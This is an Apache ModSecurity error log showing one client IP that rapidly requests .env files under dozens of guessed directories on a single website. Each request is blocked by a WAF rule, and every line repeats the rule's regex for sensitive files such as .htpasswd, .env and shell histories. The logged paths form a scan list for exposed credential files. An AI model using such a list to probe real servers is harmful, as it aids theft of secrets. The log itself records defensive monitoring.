[Tue May 26 19:10:50.850723 2026] [security2:error] [pid 18465:tid 18713] [client 93.123.109.10:33434] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/.backup/.env"] [unique_id "ahWi4k6GHndkguR9cLJzhgAAAHU"]
[Tue May 26 19:10:50.915775 2026] [security2:error] [pid 18465:tid 18648] [client 93.123.109.10:33518] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/2024/.env"] [unique_id "ahWi4k6GHndkguR9cLJzjgAAADQ"]
[Tue May 26 19:10:50.937779 2026] [security2:error] [pid 18465:tid 18633] [client 93.123.109.10:33100] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/new/.env"] [unique_id "ahWi4k6GHndkguR9cLJzjwAAACU"]
[Tue May 26 19:10:50.952139 2026] [security2:error] [pid 18465:tid 18609] [client 93.123.109.10:33360] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/api/app/.env"] [unique_id "ahWi4k6GHndkguR9cLJzkQAAAA4"]
[Tue May 26 19:10:50.952436 2026] [security2:error] [pid 18465:tid 18599] [client 93.123.109.10:33398] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/api/beta/.env"] [unique_id "ahWi4k6GHndkguR9cLJzkwAAAAQ"]
[Tue May 26 19:10:50.952985 2026] [security2:error] [pid 18465:tid 18627] [client 93.123.109.10:33070] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/api/config/.env"] [unique_id "ahWi4k6GHndkguR9cLJzkAAAAB8"]
[Tue May 26 19:10:50.953074 2026] [security2:error] [pid 18465:tid 18706] [client 93.123.109.10:33090] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/beta/.env"] [unique_id "ahWi4k6GHndkguR9cLJzlQAAAG4"]
[Tue May 26 19:10:50.953074 2026] [security2:error] [pid 18465:tid 18692] [client 93.123.109.10:33110] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/v2/.env"] [unique_id "ahWi4k6GHndkguR9cLJzlAAAAGA"]
[Tue May 26 19:10:50.953242 2026] [security2:error] [pid 18465:tid 18609] [client 93.123.109.10:33136] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/v3/.env"] [unique_id "ahWi4k6GHndkguR9cLJzmQAAAA4"]
[Tue May 26 19:10:50.953276 2026] [security2:error] [pid 18465:tid 18702] [client 93.123.109.10:33244] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/staging/.env"] [unique_id "ahWi4k6GHndkguR9cLJzlwAAAGo"]
[Tue May 26 19:10:50.953281 2026] [security2:error] [pid 18465:tid 18657] [client 93.123.109.10:33332] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/production/.env"] [unique_id "ahWi4k6GHndkguR9cLJzlgAAAD0"]
[Tue May 26 19:10:50.953359 2026] [security2:error] [pid 18465:tid 18654] [client 93.123.109.10:33320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/testing/.env"] [unique_id "ahWi4k6GHndkguR9cLJzmgAAADo"]
[Tue May 26 19:10:50.953376 2026] [security2:error] [pid 18465:tid 18623] [client 93.123.109.10:33308] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/development/.env"] [unique_id "ahWi4k6GHndkguR9cLJzmAAAABs"]
[Tue May 26 19:10:50.953723 2026] [security2:error] [pid 18465:tid 18707] [client 93.123.109.10:33156] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/api/dev/.env"] [unique_id "ahWi4k6GHndkguR9cLJzkgAAAG8"]
[Tue May 26 19:10:50.954075 2026] [security2:error] [pid 18465:tid 18603] [client 93.123.109.10:33176] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/prod/.env"] [unique_id "ahWi4k6GHndkguR9cLJznAAAAAg"]
[Tue May 26 19:10:50.955796 2026] [security2:error] [pid 18465:tid 18619] [client 93.123.109.10:33164] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/api/test/.env"] [unique_id "ahWi4k6GHndkguR9cLJzngAAABc"]
[Tue May 26 19:10:50.956282 2026] [security2:error] [pid 18465:tid 18611] [client 93.123.109.10:33300] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/test/.env"] [unique_id "ahWi4k6GHndkguR9cLJznQAAABA"]
[Tue May 26 19:10:50.956861 2026] [security2:error] [pid 18465:tid 18641] [client 93.123.109.10:33386] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/develop/.env"] [unique_id "ahWi4k6GHndkguR9cLJzmwAAAC0"]
[Tue May 26 19:10:50.956934 2026] [security2:error] [pid 18465:tid 18710] [client 93.123.109.10:33394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/api/core/.env"] [unique_id "ahWi4k6GHndkguR9cLJznwAAAHI"]
[Tue May 26 19:10:50.957050 2026] [security2:error] [pid 18465:tid 18663] [client 93.123.109.10:33146] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/stage/.env"] [unique_id "ahWi4k6GHndkguR9cLJzoAAAAEM"]
[Tue May 26 19:10:50.967033 2026] [security2:error] [pid 18465:tid 18675] [client 93.123.109.10:33132] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/.docker/.env"] [unique_id "ahWi4k6GHndkguR9cLJzoQAAAE8"]
[Tue May 26 19:10:50.967424 2026] [security2:error] [pid 18465:tid 18671] [client 93.123.109.10:33340] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/source/.env"] [unique_id "ahWi4k6GHndkguR9cLJzogAAAEs"]
[Tue May 26 19:10:50.967500 2026] [security2:error] [pid 18465:tid 18616] [client 93.123.109.10:33206] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/sources/.env"] [unique_id "ahWi4k6GHndkguR9cLJzowAAABQ"]
[Tue May 26 19:10:50.967962 2026] [security2:error] [pid 18465:tid 18717] [client 93.123.109.10:33248] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/root/.env"] [unique_id "ahWi4k6GHndkguR9cLJzpQAAAHk"]
[Tue May 26 19:10:50.968736 2026] [security2:error] [pid 18465:tid 18668] [client 93.123.109.10:33220] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/site/.env"] [unique_id "ahWi4k6GHndkguR9cLJzpgAAAEg"]
[Tue May 26 19:10:50.969025 2026] [security2:error] [pid 18465:tid 18694] [client 93.123.109.10:33324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/sysadmin/.env"] [unique_id "ahWi4k6GHndkguR9cLJzpwAAAGI"]
[Tue May 26 19:10:50.971244 2026] [security2:error] [pid 18465:tid 18656] [client 93.123.109.10:33178] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/docker/.env"] [unique_id "ahWi4k6GHndkguR9cLJzqAAAADw"]
[Tue May 26 19:10:50.971724 2026] [security2:error] [pid 18465:tid 18620] [client 93.123.109.10:33258] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/home/.env"] [unique_id "ahWi4k6GHndkguR9cLJzqgAAABg"]
[Tue May 26 19:10:50.971796 2026] [security2:error] [pid 18465:tid 18631] [client 93.123.109.10:33198] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/src/.env"] [unique_id "ahWi4k6GHndkguR9cLJzqQAAACM"]
[Tue May 26 19:10:50.971817 2026] [security2:error] [pid 18465:tid 18711] [client 93.123.109.10:33350] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/console/.env"] [unique_id "ahWi4k6GHndkguR9cLJzrAAAAHM"]
[Tue May 26 19:10:50.972053 2026] [security2:error] [pid 18465:tid 18720] [client 93.123.109.10:33362] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/panel/.env"] [unique_id "ahWi4k6GHndkguR9cLJzqwAAAHw"]
[Tue May 26 19:10:50.972332 2026] [security2:error] [pid 18465:tid 18656] [client 93.123.109.10:33292] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/control/.env"] [unique_id "ahWi4k6GHndkguR9cLJzrQAAADw"]
[Tue May 26 19:10:50.972647 2026] [security2:error] [pid 18465:tid 18610] [client 93.123.109.10:33190] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/docker-compose/.env"] [unique_id "ahWi4k6GHndkguR9cLJzrgAAAA8"]
[Tue May 26 19:10:50.974709 2026] [security2:error] [pid 18465:tid 18597] [client 93.123.109.10:33086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/webadmin/.env"] [unique_id "ahWi4k6GHndkguR9cLJzsQAAAAI"]
[Tue May 26 19:10:50.975005 2026] [security2:error] [pid 18465:tid 18620] [client 93.123.109.10:33420] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/backups/.env"] [unique_id "ahWi4k6GHndkguR9cLJzrwAAABg"]
[Tue May 26 19:10:50.986034 2026] [security2:error] [pid 18465:tid 18636] [client 93.123.109.10:33496] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/mysql/.env"] [unique_id "ahWi4k6GHndkguR9cLJzsgAAACg"]
[Tue May 26 19:10:51.094823 2026] [security2:error] [pid 18465:tid 18617] [client 93.123.109.10:33280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/sql/.env"] [unique_id "ahWi406GHndkguR9cLJztQAAABU"]
[Tue May 26 19:10:51.101797 2026] [security2:error] [pid 18465:tid 18697] [client 93.123.109.10:33270] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/2021/.env"] [unique_id "ahWi406GHndkguR9cLJztwAAAGU"]
